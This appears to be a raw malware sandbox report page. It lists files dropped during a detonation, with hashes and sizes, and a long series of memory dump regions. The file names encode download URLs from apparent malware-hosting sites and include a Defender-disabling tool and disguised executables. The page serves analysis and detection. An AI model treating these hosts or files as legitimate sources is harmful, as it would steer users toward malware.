8cfaa21f68226ae775615f033507b5756f5ccacc

SHA256
71b320a5d9456acc43494213dcd1f4ae8b7f6e27a15ac80cb42df5f19f692ec5

SHA512
b7b682717cd49b9fff9885c85f1421050613559308aa7160dee7ce493d5bff126c8157727d8f88fdfd602092203c64ab0dbff718b7ce7af9f9f2ad8375d703b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\http88.218.61.219555.exe.exe
Filesize
2.7MB

MD5
7162024dc024bb3311ee1cf81f37a791

SHA1
be03705f33a8205f90330814f525e2e53dfb5871

SHA256
3e39efae22fcda501f858229af27be129f178c85723d4477ef9be2f80b61a8fd

SHA512
94652b8b770fcdd70ee5059b56ce84aee50c46901b6311e2a602cdb4d97b15abd0148ba4e55f225f722d125bf9c3969185bcefaf07f3911a4347d9a0ca8d2d38

Download Submit
C:\Users\Admin\AppData\Local\Temp\http88.218.61.219test2.exe.exe
Filesize
2.7MB

MD5
5347852b24409aed42423f0118637f03

SHA1
6c7947428231ab857ee8c9dab7a7e62fdeed024b

SHA256
a2e678bb376d2dcec5b7d0abac428c87cd8ae75936e28c03cb4232ae97015131

SHA512
0a52f226be962eb8187f444657317d3e0385d9d47d507e6f1c028143f57153a7b8e34ef7b0c8732bb3b3d361da483a13264f511ca5c80cedda3bc439fe936991

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpfiles.offshore.catDSKeOWN1.exe.exe
Filesize
164KB

MD5
959db6fb58d86b24436a5228fdf1cd01

SHA1
fcbcb37c41b3da1c72959bd5bb234217dbdb33fb

SHA256
b39e67fdff8dad1a8f64c0d2a01e312cdecd3d64bbedd842b01216cb09f22c65

SHA512
618be717e26c8c2d18f16c6711eaab5cd38fea8166d978dece183b2fb2f6d0af20bd592d518cdd06d1607dcfd11815aa1b1bb5be91a3a7c94096e5ba99772699

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpfiles.offshore.catfxYvCG6c.exe.exe
Filesize
7.6MB

MD5
c228f16074d1919a6bf30642a6e6541e

SHA1
9857bac629403dad58ec15bb426bf5e6f5a006d7

SHA256
c51d5d9f26091b859c64a0da81fd56382af4edf3137b4683763105f9b8d56cea

SHA512
4f6bfa528305a754a11f9671641edab9f5136e71ae9fe3620948b8771ab70230ef233c4278116b86dafa1b6cf9fe46f525a4bc46e679db95f5307c6211e0f383

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpguatemalacayerealestate.combatushkainte.exe.exe
Filesize
381KB

MD5
72800fb37c56bcad3893460c67b763c8

SHA1
4bc0d2bc56087e8207a05de386446272a38962e9

SHA256
57ad7fa33cefd28e1304bb8fc59d4be34537bf2527adbf8664f44a028f1f305d

SHA512
f5f88756f808798de3e4df582cd2db4c53e7c7935b480b42a3e2c2e6b2526372ccd8ae5da84493d2680dce7448544d8d43e94ae07f1bdc03929097663e0e0e2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpra-ftp.ruimages1.jpg.exe
Filesize
683KB

MD5
859e4f75505f2ab3c7903eb3ce5d512f

SHA1
b36d2a64dfeb1d8b4b445bcf22e3969a8277d0f0

SHA256
ca4429856e10e17783fe464ca2787db610d3e25ae176c6585b2fd4ed5393e758

SHA512
aaf5d55e0735ceae88a192c0cc94eafdcbf6c8ba78ad478b28d5866e4b3a3d96695ddd53efdab40764bbf87027b8457f18416a7f05b333eb5b3930ce37fab162

Download Submit
C:\Users\Admin\AppData\Local\Temp\httproundcube.custommarinesvcs.comklounada.exe.exe
Filesize
5.5MB

MD5
616756248d85c819fd0830d660a7aaa0

SHA1
0ead8b67e103d9ec95486781c70c2b35aa9ee287

SHA256
1e2f5b51b09d3f0060700403f138e33cf4c085dde4fbb469c420e9fd840f04d3

SHA512
b50326bcdc988e947df2c01552266aeea6bd148832496b4c29328f8751268c9840f72433019ee94925151913aad77020e146567cc0cffc5ffe65905f3070b406

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpscovid19help.toppdtzx.scr.exe
Filesize
4KB

MD5
1ba45ed8ea192ec802ea88efda531a1e

SHA1
6f442f3c64cbf42abb0f85ff4fd6cef9998cfa15

SHA256
982f98e95c0a9453ad51d9b5e06b3da5dd4174aa91a6e6b69a6113f4a6e7087a

SHA512
979e1fd68f779aa1480c905a2d9a2b5b661faccd854418c529d52ea9e353038b0a8432349df42a3930691d84ada6f5e2042efbaa6cb9c77fce2541dbde7fbb6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Filesize
30KB

MD5
761900700a2dd93bf347e10fa9c14fb7

SHA1
db4904470793b785fd6b06c17312be4111da02e9

SHA256
cd21730a2de2f182773c6b9ef50d34ed9f3d55a94b7e20a987e91843f14a057b

SHA512
ce8a9bcee08e28090b84a860895079a3ef2b686fadc89d8cb859bcd36efc65734a03c7b8392f2a451d14ef14cc559e2d00463fe09a2c3f6ff5d0338996e5b4bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsfile-drop.ccD24e534svchost.exe.exe
Filesize
66KB

MD5
00135a86ab829fc2d4678179d7a6e70f

SHA1
ef75c259865d7685d566b6e25b7a20d134952555

SHA256
0b8b21af69d0b465b7b8cd584bdba1f86d062bb0c7c51656f36a66fce8e9bd89

SHA512
011389f2bc93f45b36233238a32991823c3334e3259af98e7dd6cedb455fc930d5b603f51bb69e415ab24f285309eda0b272250f1ec82a21508de0681281a0ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsfile-drop.ccD5d2a75Tester.exe.exe
Filesize
267KB

MD5
0803c1aec008e75859877844cfa81492

SHA1
16924d5802ddf76a2096fcfade0ce06d4c0670bd

SHA256
d5ab98bd209db0ed18272fe616ea4b8be34fd13d36116d25793fa7aa6f8b33e3

SHA512
9001e77da2562652ae51bdb3b8b9bfe686d0ed0c4eb8d338b20b7c4eb6eb8e90a4fae01d8212b1908037d5ff456e982500e4907686c38e5c33e969d55ba914d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
Filesize
294KB

MD5
10fc8b2915c43aa16b6a2e2b4529adc5

SHA1
0c15286457963eb86d61d83642870a3473ef38fe

SHA256
feb09cc39b1520d228e9e9274500b8c229016d6fc8018a2bf19aa9d3601492c5

SHA512
421631c06408c3be522953459228d2e1d45eeeafce29dba7746c8485a105b59c3a2c0d9e2ffc6d89126cd825ffd09ebe7eb82223a69d1f5caf441feb01e57897

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe
Filesize
45KB

MD5
e93bd9e06b8b09c7f697bff19e1da942

SHA1
a5efe9e9115a9d7ca92c3169af71546e254d062e

SHA256
de74d9f4418390f531456319015719dbcee1d5692b4b19800e7a492218d0badc

SHA512
6e43d19adf860cfdfc2a711ca72dd84f3376e514473077106f99f1aa0f509e6d5765d3499a52c13599674d33366f35fd3158a9c02ebdc045fb637e81986e0b08

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe
Filesize
44KB

MD5
e7c5758f3aa16c6758567493d68d2d66

SHA1
4b7f6171df89ceae77ba75193efb235ff1a099af

SHA256
eb5e198c848019da509e83fff8f046f32b50758b28066e0a22cae53e4783faa6

SHA512
5a66b15aae538734c2e0ab2bd089d4bc8a79ee599fe5acff1b9e581a1076694995185e92d9a90a1000b3fc0a486ddda1c9cd972b38676753d60a97c700592b58

Download Submit
C:\Users\Admin\UndLdl.ps1
Filesize
1KB

MD5
6707df486205804693821eebad4c03f3

SHA1
fb4e723b632090036463d44e58ecedef4b688958

SHA256
cd78d5da40004dbaa8688d97063d1c9b3cee41ba72e8f9152ee38d86cf6efb50

SHA512
4b497ee77faeddae306b69a45641ab8f11ebbd9712664a614be009d6ab9632cb05f2025ae9631cb51801a4f6c2e3d48b38082b9b5fca41241ec5a0088c9e88ef

Download Submit
C:\Users\Admin\start.vbs
Filesize
231B

MD5
abe1dd23ab4c11aae54f1898c780c0b5

SHA1
bb2f974b3e0af2baa40920b475582bfd4fb28001

SHA256
89054e19532a9a62ca3403a8899495bf6f06557ff886b475a04227eb8aba7b12

SHA512
e9ec437a32301078ea69ce2f36dadab68315d5e56d94c4d579d3409ccbe0c9e00c3aed7baa0fa6d656fb8ed23213f4c01fb2d108c1a0ed11c58c76cd00f9a99d

Download Submit
C:\Users\Admin\temp.bat
Filesize
545KB

MD5
1ab2d7cc96ad2b86edf74d5497b45def

SHA1
baac72428aaff76788b6e0056b720c6920d0e6f8

SHA256
1e23a11308681733cff73f23933670c4350cec867042bbe5f7ff54a6dcc1dd83

SHA512
8b5a456b4a4c97e28b6e90735eb9a006e8afbcd3d588e04b7bd3ab24e20ef80e37cc08412cc421c0f465c148f5b1c181ea798585865bd82f9861c1a7351194a1

Download Submit
memory/780-220-0x0000000002D80000-0x0000000002D81000-memory.dmp

Filesize
4KB

Download
memory/780-222-0x0000000000020000-0x000000000090E000-memory.dmp

Filesize
8.9MB

Download
memory/780-223-0x0000000000020000-0x000000000090E000-memory.dmp

Filesize
8.9MB

Download
memory/928-113-0x00007FFCC23C0000-0x00007FFCC2E81000-memory.dmp

Filesize
10.8MB

Download
memory/928-0-0x000001ADA7B00000-0x000001ADA7B0A000-memory.dmp

Filesize
40KB

Download
memory/928-161-0x000001ADC20C0000-0x000001ADC20D0000-memory.dmp

Filesize
64KB

Download
memory/928-1-0x00007FFCC23C0000-0x00007FFCC2E81000-memory.dmp

Filesize
10.8MB

Download
memory/928-2-0x000001ADC20C0000-0x000001ADC20D0000-memory.dmp

Filesize
64KB

Download
memory/2548-230-0x0000000007110000-0x00000000071A6000-memory.dmp

Filesize
600KB

Download
memory/2548-173-0x0000000005B60000-0x0000000005B7E000-memory.dmp

Filesize
120KB

Download
memory/2548-206-0x000000007F070000-0x000000007F080000-memory.dmp

Filesize
64KB

Download
memory/2548-231-0x00000000070B0000-0x00000000070C1000-memory.dmp

Filesize
68KB

Download
memory/2548-174-0x00000000060E0000-0x000000000612C000-memory.dmp

Filesize
304KB

Download
memory/2548-229-0x0000000006CF0000-0x0000000006CFA000-memory.dmp

Filesize
40KB

Download
memory/2548-84-0x00000000045A0000-0x00000000045D6000-memory.dmp

Filesize
216KB

Download
memory/2548-155-0x00000000056E0000-0x0000000005A34000-memory.dmp

Filesize
3.3MB

Download
memory/2548-187-0x00000000045F0000-0x0000000004600000-memory.dmp

Filesize
64KB

Download
memory/2548-170-0x0000000074840000-0x0000000074FF0000-memory.dmp

Filesize
7.7MB

Download
memory/2548-134-0x00000000053B0000-0x00000000053D2000-memory.dmp

Filesize
136KB

Download
memory/2548-107-0x0000000004C30000-0x0000000005258000-memory.dmp

Filesize
6.2MB

Download
memory/2548-203-0x0000000006B40000-0x0000000006B72000-memory.dmp

Filesize
200KB

Download
memory/2548-205-0x0000000073430000-0x000000007347C000-memory.dmp

Filesize
304KB

Download
memory/2548-216-0x00000000060C0000-0x00000000060DE000-memory.dmp

Filesize
120KB

Download
memory/2548-217-0x0000000006B80000-0x0000000006C23000-memory.dmp

Filesize
652KB

Download
memory/2548-153-0x0000000005670000-0x00000000056D6000-memory.dmp

Filesize
408KB

Download
memory/2548-219-0x00000000075A0000-0x0000000007C1A000-memory.dmp

Filesize
6.5MB

Download
memory/2548-148-0x0000000005590000-0x00000000055F6000-memory.dmp

Filesize
408KB

Download
memory/2548-94-0x00000000045F0000-0x0000000004600000-memory.dmp

Filesize
64KB

Download
memory/2548-89-0x00000000045F0000-0x0000000004600000-memory.dmp

Filesize
64KB

Download
memory/2548-221-0x0000000006CA0000-0x0000000006CBA000-memory.dmp

Filesize
104KB

Download
memory/2548-88-0x0000000074840000-0x0000000074FF0000-memory.dmp

Filesize
7.7MB

Download
memory/2692-226-0x0000000005440000-0x0000000005450000-memory.dmp

Filesize
64KB

Download
memory/2692-176-0x0000000005440000-0x0000000005450000-memory.dmp

Filesize
64KB

Download
memory/2692-175-0x0000000074840000-0x0000000074FF0000-memory.dmp

Filesize
7.7MB

Download
memory/2692-235-0x0000000074840000-0x0000000074FF0000-memory.dmp

Filesize
7.7MB

Download
memory/3076-162-0x0000000000400000-0x000000000046E000-memory.dmp

Filesize
440KB

Download
memory/3076-218-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/3076-159-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/3076-296-0x0000000000400000-0x000000000046E000-memory.dmp

Filesize
440KB

Download
memory/3076-160-0x0000000002090000-0x00000000020BD000-memory.dmp

Filesize
180KB

Download
memory/3156-76-0x00000000748D0000-0x0000000075080000-memory.dmp

Filesize
7.7MB

Download
memory/3156-66-0x00000000748D0000-0x0000000075080000-memory.dmp

Filesize
7.7MB

Download
memory/3156-65-0x0000000000EC0000-0x0000000000ED0000-memory.dmp

Filesize
64KB

Download
memory/3156-70-0x00000000056E0000-0x00000000056F0000-memory.dmp

Filesize
64KB

Download
memory/3528-146-0x0000000005790000-0x0000000005791000-memory.dmp

Filesize
4KB

Download
memory/3528-154-0x0000000005820000-0x0000000005822000-memory.dmp

Filesize
8KB

Download
memory/3528-115-0x0000000000DE0000-0x000000000137D000-memory.dmp

Filesize
5.6MB

Download
memory/3528-127-0x0000000077CF4000-0x0000000077CF6000-memory.dmp

Filesize
8KB

Download
memory/3528-130-0x00000000057A0000-0x00000000057A1000-memory.dmp

Filesize
4KB

Download
memory/3528-202-0x0000000000DE0000-0x000000000137D000-memory.dmp

Filesize
5.6MB

Download
memory/3528-131-0x0000000005770000-0x0000000005771000-memory.dmp

Filesize
4KB

Download
memory/3528-177-0x0000000000DE0000-0x000000000137D000-memory.dmp

Filesize
5.6MB

Download
memory/3528-526-0x0000000000DE0000-0x000000000137D000-memory.dmp

Filesize
5.6MB

Download
memory/3528-132-0x0000000005760000-0x0000000005761000-memory.dmp

Filesize
4KB

Download
memory/3528-133-0x00000000057D0000-0x00000000057D1000-memory.dmp

Filesize
4KB

Download
memory/3528-135-0x0000000005750000-0x0000000005751000-memory.dmp

Filesize
4KB

Download
memory/3528-141-0x00000000057B0000-0x00000000057B1000-memory.dmp

Filesize
4KB

Download
memory/3528-143-0x00000000057E0000-0x00000000057E1000-memory.dmp

Filesize
4KB

Download
memory/3528-144-0x0000000005800000-0x0000000005801000-memory.dmp

Filesize
4KB

Download
memory/3528-147-0x00000000057F0000-0x00000000057F1000-memory.dmp

Filesize
4KB

Download
memory/3528-305-0x0000000000DE0000-0x000000000137D000-memory.dmp

Filesize
5.6MB

Download
memory/3528-152-0x0000000005740000-0x0000000005741000-memory.dmp

Filesize
4KB

Download
memory/3728-169-0x0000000002280000-0x00000000023CF000-memory.dmp

Filesize
1.3MB

Download
memory/3728-171-0x00000000021C0000-0x0000000002275000-memory.dmp

Filesize
724KB

Download
memory/3728-172-0x0000000000400000-0x0000000000552000-memory.dmp

Filesize
1.3MB

Download
memory/4320-515-0x000000001B970000-0x000000001BA80000-memory.dmp

Filesize
1.1MB

Download
memory/4320-491-0x000000001B970000-0x000000001BA80000-memory.dmp

Filesize
1.1MB

Download
memory/4320-503-0x000000001B970000-0x000000001BA80000-memory.dmp

Filesize
1.1MB

Download
memory/4320-488-0x000000001B970000-0x000000001BA80000-memory.dmp

Filesize
1.1MB

Download
memory/4320-506-0x000000001B970000-0x000000001BA80000-memory.dmp

Filesize
1.1MB

Download
memory/4320-489-0x000000001B970000-0x000000001BA80000-memory.dmp

Filesize
1.1MB

Download
memory/4320-493-0x000000001B970000-0x000000001BA80000-memory.dmp

Filesize
1.1MB

Download
memory/4320-511-0x000000001B970000-0x000000001BA80000-memory.dmp

Filesize
1.1MB

Download
memory/4320-499-0x000000001B970000-0x000000001BA80000-memory.dmp

Filesize
1.1MB

Download
memory/4320-495-0x000000001B970000-0x000000001BA80000-memory.dmp

Filesize
1.1MB

Download
memory/4320-520-0x000000001B970000-0x000000001BA80000-memory.dmp

Filesize
1.1MB

Download
memory/4320-552-0x000000001B970000-0x000000001BA80000-memory.dmp

Filesize
1.1MB

Download
memory/4320-549-0x000000001B970000-0x000000001BA80000-memory.dmp

Filesize
1.1MB

Download
memory/4320-528-0x000000001B970000-0x000000001BA80000-memory.dmp

Filesize
1.1MB

Download
memory/4320-545-0x000000001B970000-0x000000001BA80000-memory.dmp

Filesize
1.1MB

Download
memory/4320-532-0x000000001B970000-0x000000001BA80000-memory.dmp

Filesize
1.1MB

Download
memory/4320-535-0x000000001B970000-0x000000001BA80000-memory.dmp

Filesize
1.1MB

Download
memory/4320-539-0x000000001B970000-0x000000001BA80000-memory.dmp

Filesize
1.1MB

Download
memory/4320-541-0x000000001B970000-0x000000001BA80000-memory.dmp

Filesize
1.1MB

Download
memory/4552-164-0x0000000002120000-0x000000000218B000-memory.dmp

Filesize
428KB

Download
memory/4552-237-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/4552-201-0x0000000000400000-0x00000000004BA000-memory.dmp

Filesize
744KB

Download
memory/4552-163-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/4552-166-0x0000000000400000-0x00000000004BA000-memory.dmp

Filesize
744KB

Download
memory/4552-165-0x0000000000400000-0x00000000004BA000-memory.dmp

Filesize
744KB

Download
memory/4776-238-0x0000000074840000-0x0000000074FF0000-memory.dmp

Filesize
7.7MB

Download
memory/5572-410-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/5572-505-0x00007FFCE16F0000-0x00007FFCE18E5000-memory.dmp

Filesize
2.0MB

Download
memory/5572-510-0x00000000764C0000-0x00000000766D5000-memory.dmp

Filesize
2.1MB

Download
memory/5572-501-0x0000000004130000-0x0000000004530000-memory.dmp

Filesize
4.0MB

Download
memory/5572-405-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/5572-496-0x0000000004130000-0x0000000004530000-memory.dmp

Filesize
4.0MB

Download
memory/5888-512-0x0000000000BD0000-0x0000000000BD9000-memory.dmp

Filesize
36KB

Download
memory/5888-518-0x0000000002910000-0x0000000002D10000-memory.dmp

Filesize
4.0MB

Download
memory/5888-525-0x00007FFCE16F0000-0x00007FFCE18E5000-memory.dmp

Filesize
2.0MB

Download
memory/5888-529-0x00000000764C0000-0x00000000766D5000-memory.dmp

Filesize
2.1MB

Download